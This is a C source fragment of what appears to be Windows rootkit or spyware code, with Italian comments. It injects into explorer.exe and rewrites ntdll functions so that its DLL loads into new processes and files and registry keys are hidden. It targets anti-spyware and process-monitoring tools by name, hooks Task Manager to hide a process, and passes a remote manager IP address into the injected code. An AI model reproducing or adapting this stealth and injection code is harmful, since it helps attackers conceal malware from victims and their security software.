	Inject_Rewrite(hProcess, &WrapNtQueryDirectoryFile, 1024, &DataWrap_NtQueryDirectoryFile, sizeof(NTQUERYDIRECTORYFILE_WRAP), "NtQueryDirectoryFile");
	Inject_Rewrite(hProcess, &WrapNtEnumerateValueKey, 1024, &DataWrap_NtEnumerateValueKey, sizeof(NTENUMERATEVALUEKEY_WRAP), "NtEnumerateValueKey");
}
// FUNZIONE ESPORTATA --------------------------------------------------------------------




void HideDLL(char *HHDLL_Name)
{
	char *Programs_to_inject[20];

	HANDLE  Snap, hProcess;
	PROCESSENTRY32 lppe;
	NTCREATEPROCESSRW_WRAP DataWrap_CreateProcess;

	NTQUERYDIRECTORYFILE_WRAP DataWrap_NtQueryDirectoryFile;
	int Remote_Host;

	HMODULE hMod = LoadLibrary("kernel32.dll");

	WORD wVersionRequested;
	WSADATA wsaData;
 

	memset(Programs_to_inject, 0, sizeof(Programs_to_inject));
	Programs_to_inject[0]=strdup("TaskInfo");
	Programs_to_inject[1]=strdup("TeaTimer");
	Programs_to_inject[2] = strdup("SpybotSD.exe");
	Programs_to_inject[3] = strdup("procexp.exe");
	Programs_to_inject[4] = strdup("tcm.exe");

	wVersionRequested = MAKEWORD( 2, 2 );
	WSAStartup( wVersionRequested, &wsaData );

	/*struct hostent *rht = gethostbyname(SERVER_NAME);
	if (rht && rht->h_addr)
		memcpy(&Remote_Host, rht->h_addr, 4);*/
	Remote_Host = htonl(ex_ManagerIP);

	DataWrap_CreateProcess.PID_Explorer = GetCurrentProcessId();
	DataWrap_CreateProcess.Remote_Host = Remote_Host;
	DataWrap_CreateProcess.m_LoadLibrary =(LOADLIBRARY) GetProcAddress( hMod, "LoadLibraryA" );
	DataWrap_CreateProcess.m_FreeLibrary =(FREELIBRARY) GetProcAddress( hMod, "FreeLibrary" );
	DataWrap_CreateProcess.m_GetProcAddress =(GETPROCADDRESS) GetProcAddress( hMod, "GetProcAddress");
	strcpy(DataWrap_CreateProcess.LibName, HHDLL_Name);
	
	Snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

	lppe.dwSize = sizeof(PROCESSENTRY32);

	// XXX - Modifica per cambio utente rapido su XP
	for (Process32First(Snap,  &lppe);;) {

		if (!stricmp(lppe.szExeFile, PROCESSFILE)) {
			hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lppe.th32ProcessID);
			if (hProcess) {
				CloseHandle(hProcess);
				break;
			}

			CloseHandle(hProcess);
		}
		
		if (!Process32Next(Snap,  &lppe)) break;
	}
	// ------ XXX ------

	if (!stricmp(lppe.szExeFile, PROCESSFILE)) {
		hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lppe.th32ProcessID);
		
		// XXX Stiamo facendo una REWRITE su un processo gia' attivo (explorer.exe)
		Inject_Rewrite(hProcess, &WrapNtCreateProcess, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcess");
		Inject_Rewrite(hProcess, &WrapNtCreateProcessEx, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcessEx");
		Inject_Rewrite(hProcess, &WrapNtQueryDirectoryFile, 1024, &DataWrap_NtQueryDirectoryFile, sizeof(NTQUERYDIRECTORYFILE_WRAP), "NtQueryDirectoryFile");
	}
	
	for (int index=0; Programs_to_inject[index]; index++) {
		for (Process32First(Snap,  &lppe);;) {
			if (strstr(upstr(lppe.szExeFile), upstr(Programs_to_inject[index]))) {
				hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lppe.th32ProcessID);
				if (hProcess) {
					doWrapping( hProcess, GetCurrentProcessId(), Remote_Host, HHDLL_Name);
					CloseHandle(hProcess);
				}
			}

			if (!Process32Next(Snap,  &lppe)) break;
		}
	}

	CloseHandle(Snap);
}



DWORD WINAPI HideTaskManager(ThreadParams *TMParam)
{
	        
	HWND MainWin = NULL;
	DWORD PID, LastPid = 0, LastPidExplorer = 0;
	NTQUERYSYSTEMINFORMATION_WRAP DataNtQuerySystemInformation;
	HANDLE  Snap, hProcess;
	PROCESSENTRY32 lppe;
	NTCREATEPROCESSRW_WRAP DataWrap_CreateProcess;
	NTQUERYDIRECTORYFILE_WRAP DataWrap_NtQueryDirectoryFile;
	int Remote_Host;

	while(1)
	{
		Sleep(250);

		// Nasconde da Task Manager
		MainWin = FindWindowEx(NULL, NULL, "#32770","Windows Task Manager");
		if (!MainWin)
			MainWin = FindWindowEx(NULL, NULL, "#32770","Task Manager Windows");

		// Se e' attivo Task Manager
		if (MainWin) {
			PID = 0;
			GetWindowThreadProcessId (MainWin, &PID);		
			
			// se non abbiamo gia' injectato dentro questo TaskManager
			if (LastPid != PID && PID) {
	
				LastPid = PID;

				hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, PID);		
			
				//DataWrap_NtQuerySystemInformation.PID1 = HideID;
				//Inject(hProcess, WrapNtQuerySystemInformationTM, 1024, &DataWrap_NtQuerySystemInformation, sizeof(NTQUERYSYSTEMINFORMATIONTM_WRAP), "ntdll.dll", "NtQuerySystemInformation");

				DataNtQuerySystemInformation.PID1 = TMParam->Pid;
				Inject_Rewrite(hProcess, &WrapNtQuerySystemInformation, 1024, &DataNtQuerySystemInformation, sizeof(NTQUERYSYSTEMINFORMATION_WRAP), "NtQuerySystemInformation");

				// Forziamo l'update (dal menu' refresh now) !!!
				HMENU menu = GetMenu(MainWin);
				HMENU submenu = GetSubMenu(menu, 2);
				int pos = GetMenuItemID(submenu, 0);
				PostMessage(MainWin, WM_COMMAND, (WPARAM) pos, 0);
			}
		}

/*
		// Nasconde da eventuali nuovi explorer
		Snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

		lppe.dwSize = sizeof(PROCESSENTRY32);

		for (Process32First(Snap,  &lppe); strcmp(lppe.szExeFile, PROCESSFILE) ;)
			if (!Process32Next(Snap,  &lppe)) break;

		if (!strcmp(lppe.szExeFile, PROCESSFILE) && LastPidExplorer && LastPidExplorer != lppe.th32ProcessID) {
			HMODULE hMod = GetModuleHandle("kernel32.dll");
			Remote_Host = htonl(ex_ManagerIP);
			DataWrap_CreateProcess.PID_Explorer = GetCurrentProcessId();
			DataWrap_CreateProcess.Remote_Host = Remote_Host;
			DataWrap_CreateProcess.m_LoadLibrary =(LOADLIBRARY) GetProcAddress( hMod, "LoadLibraryA" );
			DataWrap_CreateProcess.m_FreeLibrary =(FREELIBRARY) GetProcAddress( hMod, "FreeLibrary" );
			DataWrap_CreateProcess.m_GetProcAddress =(GETPROCADDRESS) GetProcAddress( hMod, "GetProcAddress");
			strcpy(DataWrap_CreateProcess.LibName, TMParam->dll_name);

			hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lppe.th32ProcessID);
			
			// XXX Stiamo facendo una REWRITE su un processo gia' attivo (explorer.exe)
			Inject_Rewrite(hProcess, &WrapNtCreateProcess, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcess");
			Inject_Rewrite(hProcess, &WrapNtCreateProcessEx, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcessEx");

			Inject_Rewrite(hProcess, &WrapNtQueryDirectoryFile, 1024, &DataWrap_NtQueryDirectoryFile, sizeof(NTQUERYDIRECTORYFILE_WRAP), "NtQueryDirectoryFile");
		}

		if (!strcmp(lppe.szExeFile, PROCESSFILE))
			LastPidExplorer = lppe.th32ProcessID;
*/
	}

	// not reached :)
	return 0;
}
